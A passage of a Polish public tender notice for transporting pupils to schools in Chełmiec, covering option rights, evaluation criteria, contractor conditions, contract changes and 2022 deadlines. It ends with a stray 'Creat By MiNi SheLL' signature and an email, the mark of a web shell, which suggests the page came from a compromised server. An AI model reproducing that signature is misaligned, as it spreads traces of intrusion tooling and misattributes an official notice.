wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji.<br/><br/>21.	Wykonawca jest zobowiązany do realizacji usług w ramach prawa opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający, zgodnie z treścią oświadczenia Zamawiającego o skorzystaniu z prawa opcji i na warunkach określonych w niniejszej umowie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. dla poszczególnych części:<br/>część 1) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>część 2) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni)<br/>część 3) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 109 dni)<br/>część 4) od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 88 dni) <br/>na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji.<br/><br/>21.	Wykonawca jest zobowiązany do realizacji usług w ramach prawa opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający, zgodnie z treścią oświadczenia Zamawiającego o skorzystaniu z prawa opcji i na warunkach określonych w niniejszej umowie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu dotyczą:<br/> <br/> a) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w tym zakresie.<br/> <br/> b) uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/> Niniejszy warunek Zamawiający uzna za spełniony, jeżeli Wykonawca posiada licencję na wykonywanie transportu drogowego.<br/> <br/> c) sytuacji ekonomicznej lub finansowej:<br/> W ramach niniejszego warunku wykonawca ma obowiązek wykazać, że posiada aktualną, ważną polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/><br/> d) zdolności technicznej lub zawodowej:<br/> Niniejszy warunek Zamawiający uzna za spełniony, jeżeli Wykonawca dysponuje zarejestrowanymi autobusami, busami o liczbie miejsc siedzących w liczbie niezbędnej dla realizacji usługi. Ponadto Wykonawca przed podpisaniem umowy zobowiązany jest do przedstawienia prawa jazdy oraz zezwolenia na wykonywanie regularnych specjalistycznych przewozów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">◦ w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający wymaga:<br/> a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, według wzoru stanowiącego załącznik nr 5 do SWZ,<br/> b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/> • art. 108 ust. 1 pkt. 1 uPzp<br/> • art. 108 ust. 1 pkt. 2 uPzp<br/> • art. 108 ust. 1 pkt 3 uPzp, <br/> • art. 108 ust. 1 pkt 4 uPzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/> • art. 108 ust. 1 pkt 5 uPzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/> • art. 108 ust. 1 pkt 6 uPzp, <br/> • art. 109 ust. 1 pkt 1 uPzp, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170), <br/> • art. 109 ust. 1 pkt. 4 uPzp<br/> • art. 109 ust. 1 pkt. 6 uPzp.<br/>• art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">•	na potwierdzenie warunków udziału w postępowaniu, o którym mowa w rozdziale VII SWZ ust. 1 lit b Zamawiający żąda dokumentu potwierdzającego posiadanie licencji na wykonywanie transportu drogowego<br/>•	na potwierdzenie warunków udziału w postępowaniu, o którym mowa w rozdziale VII SWZ ust. 1 lit. c Zamawiający żąda przedłożenia dokumentów potwierdzających, że Wykonawca posiada aktualną, ważną polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>•	Na potwierdzenie warunków udziału w postępowaniu, o którym mowa w rozdziale VII SWZ ust.1 lit. d Zamawiający żąda przedłożenia dokumentu, z którego wynika, że Wykonawca dysponuje zarejestrowanymi autobusami, busami o liczbie miejsc siedzących w liczbie niezbędnej dla realizacji usługi. Ponadto Wykonawca przed podpisaniem umowy zobowiązany jest do przedstawienia prawa jazdy. Ponadto wykonawca przedstawi dokument potwierdzający posiadanie pojazdu dostosowanego do przewozu osób niepełnosprawnych poruszających się na wózkach inwalidzkich (z odpowiednią homologacją, a w przypadku jej braku opinią rzeczoznawcy, stwierdzającą przystosowanie pojazdu do przewozu osób niepełnosprawnych na wózkach) – dotyczy trasy nr 4.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy (stanowiący treść oferty), zgodnie z załącznikiem nr 1 do SWZ, składany za pomocą środków komunikacji elektronicznej należy opatrzyć kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XII SWZ. <br/> 2. Oświadczenie wstępnie potwierdzające spełnienie przez wykonawcę warunków udziału w postępowaniu oraz brak przesłanek do wykluczenia, o którym mowa w art. 125 ust. 1 uPzp zgodnie z załącznikiem nr 2 do SWZ, składane za pomocą środków komunikacji elektronicznej należy opatrzyć kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XII SWZ. <br/> 3. Pełnomocnictwo do reprezentowania Wykonawcy – w przypadku złożenia oferty przez pełnomocnika. Pełnomocnictwo musi zawierać w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania. <br/> 4. Zaparafowany wzór umowy - należy dołączyć do oferty jako potwierdzenie akceptacji postanowień jej zapisów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia i dokumenty Wykonawców występujących wspólnie: a) Wykonawcyustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówieniaalbo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego.W<br/>związku z tym należy wskazane pełnomocnictwo złożyć wraz z ofertą. b) Wodniesieniu do<br/>warunku udziału w postępowaniu dotyczącego zdolności technicznej lubzawodowej wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać nazdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których tezdolności są<br/>wymagane. W tym przypadku, wykonawcy wspólnie ubiegający się o udzieleniezamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlanewykonają<br/>poszczególni wykonawcy. c) Wykonawcy występujący wspólnie powinni złożyćoświadczenia i<br/>dokumenty, o których mowa w niniejszym rozdziale SWZ, z tym, że oświadczeniewstępne<br/>wymienione w ust. 1 niniejszego rozdziału SWZ (oświadczenie wg wzoru stanowiącegozałącznik<br/>nr 2 do SWZ) składa każdy Wykonawca z osobna, natomiast oświadczeniapotwierdzające<br/>spełnianie warunków udziału w postępowaniu określonych przez Zamawiającegomogą być<br/>składane wspólnie. d) Dokument o którym mowa w ust. 1 niniejszego<br/>rozdziałuSWZ(oświadczenie wg wzoru stanowiącego załącznik nr 2 do SWZ) powinien potwierdzaćspełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z<br/>wykonawcówwykazuje spełnianie warunków udziału w postępowaniu. e) Zamawiający nie<br/>zastrzegaobowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie<br/>ubiegającychsię o udzielenie zamówienia publicznego kluczowych zadań dotyczących<br/>przedmiotowegozamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4. Zamawiający zastrzega sobie możliwość zmian postanowień umowy w zakresie przedmiotu umowy w następujących przypadkach: <br/> a) rozszerzenie lub zawężenie trasy: - w przypadku zmiany szkoły/placówki do których uczęszczają dzieci w trakcie roku szkolnego; - w przypadku rezygnacji z dowozu, zastąpienia jednego dziecka innym dzieckiem, którego podanie wpłynęło w trakcie realizacji zamówienia, bez względu na adres zamieszkania i adres placówki, do której dziecko będzie dowożone; - w przypadku zmiany adresu zamieszkania dzieci w trakcie roku szkolnego; <br/> b) zmiana częstotliwości kursów, liczby przewozów, terminów wykonywania usługi – w przypadku gdy jest to podyktowane obiektywnymi czynnikami niemożliwymi do przewidzenia <br/> c) zawieszenie usług na czas określony, w szczególności w przypadku trwania stanu pandemii COVID-19.<br/>d) zmniejszenie ilości kursów w związku z ogłoszeniem dni wolnych od szkoły (godzin dyrektorskich w poszczególnych szkołach).<br/>e) skorzystanie z prawa opcji poprzez zawarcie aneksu terminowego na kolejny okres realizacji usługi tj. przedłużenie umowy do dnia 23.06.2023.<br/>f) zmiana cen jednostkowych za km trasy – Zamawiający dokona waloryzacji wynagrodzenia, jeżeli cena oleju napędowego/benzyny (w zależności od rodzaju paliwa używanego w pojazdach Wykonawcy) przekroczy próg 8,20 zł netto za 1 l paliwa. W takim przypadku Zamawiający dokona waloryzacji wynagrodzenia za „jeden dzień przewozu” za cały miesiąc w którym zmiana ceny miała miejsce. W przypadku kiedy ceny powrócą do poprzednich wartości Wykonawca będzie świadczył usługę po cenach przedstawionych w ofercie.<br/>5.	Zamawiający zastrzega sobie prawo zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich wykonywania oraz liczby dzieci, ze względu na okoliczności których strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowanych potrzebami Zamawiającego wynikającymi z realizacji obowiązku zapewnienia dzieciom dowozu do szkół/placówek. W przypadku wpłynięcia podania kolejnego dziecka w takcie trwania umowy Zamawiający ma prawo rozszerzyć zakres trasy, przeliczając proporcjonalnie do oferty ilość km nowej trasy po cenie za 1 km wynikającej z treści złożonej oferty. Zmiana umowy zostanie zawarta przez podpisanie aneksu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/chelmiec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Kryterium pierwsze – „Cena”: <br/> W kryterium „Cena” ilość punktów zostanie obliczona oddzielnie dla każdej części oferty, według poniższego wzoru: <br/> K1 = ( CN / CB ) x 60 <br/> K1 – punkty otrzymane przez ofertę w kryterium „Cena” <br/> CN – najniższa cena spośród wszystkich ważnych ofert (nieodrzuconych) <br/> CB - cena w ofercie badanej <br/> W tym kryterium jako „cena” przyjęta zostanie „cena brutto za km trasy” podana przez Wykonawcę w Formularzu ofertowym. <br/> Kryterium drugie – „Czas podstawienia pojazdu zastępczego w razie awarii”: <br/> W kryterium „Czas podstawienia pojazdu zastępczego w razie awarii” ilość punktów zostanie przyznana oddzielnie dla każdej części oferty, według tabeli zwartej w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com